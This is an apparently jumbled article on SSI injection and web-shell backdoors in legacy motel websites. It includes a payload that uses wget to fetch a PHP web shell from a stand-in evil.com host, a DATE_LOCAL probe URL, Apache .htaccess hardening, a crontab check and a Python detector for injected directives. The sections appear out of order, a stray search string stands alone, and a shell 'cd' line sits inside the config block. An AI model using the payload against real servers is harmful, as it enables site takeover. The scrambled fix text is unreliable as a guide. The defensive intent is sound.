The attacker then injects a malicious SSI directive into the file. A common payload:

<!--#exec cmd="wget http://evil.com/shell.txt -O /home/public/shell.php" -->

This downloads a PHP web shell (often named something innocuous like image.php or css.php).
They test for SSI injection by passing a parameter, e.g.:

https://www.target-motel.com/view/index.shtml?page=<!--#echo var="DATE_LOCAL" -->

If the server returns the current date/time, the attacker confirms they can execute SSI directives.

inurl view index shtml motel fix
For Apache (these are mod_include directives; put them in the .htaccess in the web root):

cd /var/www/html/

# Disable SSI execution for all .shtml files
Options -Includes
<IfModule mod_include.c>
    # If SSI must stay enabled, use "Options +IncludesNOEXEC" instead of the
    # line above: it keeps #include but refuses #exec cmd.
    <FilesMatch "\.shtml$">
        SSILegacyExprParser off
    </FilesMatch>
</IfModule>
At first glance, it reads like gibberish: a mix of a Google search operator (inurl:), a file path (view/index.shtml), a random word (motel), and a desperate plea (fix). However, this string is anything but random. It represents one of the most persistent, low-level website defacement and backdoor patterns from the mid-2000s, one that still plagues legacy servers today.
crontab -l

Look for wget, curl, or php commands that run frequently. Delete any that you did not add.

This vulnerability exists because your server executes SSI commands from user input. Here is how to kill it forever.
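A defender-side check for the DATE_LOCAL probe and for directives already injected into .shtml files, added here as an example that is not the article's own code: it URL-decodes request lines and page bodies, lists every SSI directive found, and rates exec highest. The log lines, client address and page body below are constructed samples.

```python
import re
from urllib.parse import unquote

# Matches any SSI tag of the form <!--#directive attr="value" -->
SSI_RE = re.compile(r'<!--#\s*(\w+)\b([^>]*?)-->', re.IGNORECASE)
# exec runs a shell command; include can splice in other files; echo is the classic probe
RISK = {"exec": "high", "include": "medium", "echo": "low"}
RANK = {"none": 0, "low": 1, "review": 2, "medium": 3, "high": 4}

def find_ssi_directives(text):
    """Return (directive, risk) for every SSI tag in text.

    The text is URL-decoded twice first, so an encoded probe in a query
    string (%3C!--%23echo ...) is caught as well as a literal tag in a file.
    Unknown directives (printenv, set, ...) are returned as "review".
    """
    text = unquote(unquote(text))
    out = []
    for m in SSI_RE.finditer(text):
        name = m.group(1).lower()
        out.append((name, RISK.get(name, "review")))
    return out

def highest_risk(text):
    """Collapse a scan to one severity: none / low / review / medium / high."""
    risks = [r for _, r in find_ssi_directives(text)]
    return max(risks, key=RANK.get, default="none")

def scan_log_lines(lines):
    """Flag access-log lines whose request carries an SSI tag: (client, directives)."""
    hits = []
    for line in lines:
        found = find_ssi_directives(line)
        if found:
            hits.append((line.split()[0], [name for name, _ in found]))
    return hits

# Constructed sample page body: one legitimate include, one injected exec
SAMPLE_SHTML = ('<!--#include virtual="/inc/header.html" -->\n'
                '<h1>Welcome</h1>\n'
                '<!--#exec cmd="uname -a" -->\n')
# Constructed sample access-log lines: one encoded probe, one normal request
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /view/index.shtml'
    '?page=%3C!--%23echo%20var%3D%22DATE_LOCAL%22%20--%3E HTTP/1.1" 200 512',
    '203.0.113.8 - - [10/Oct/2023:13:56:01 +0000] "GET /view/index.shtml'
    '?page=about HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(highest_risk(SAMPLE_SHTML), find_ssi_directives(SAMPLE_SHTML))
    print(scan_log_lines(SAMPLE_LOG))
```

Run it over each .shtml under the web root and over the access log; any exec hit in a file is an injected directive, and echo probes in the log show who tested the site before it was modified.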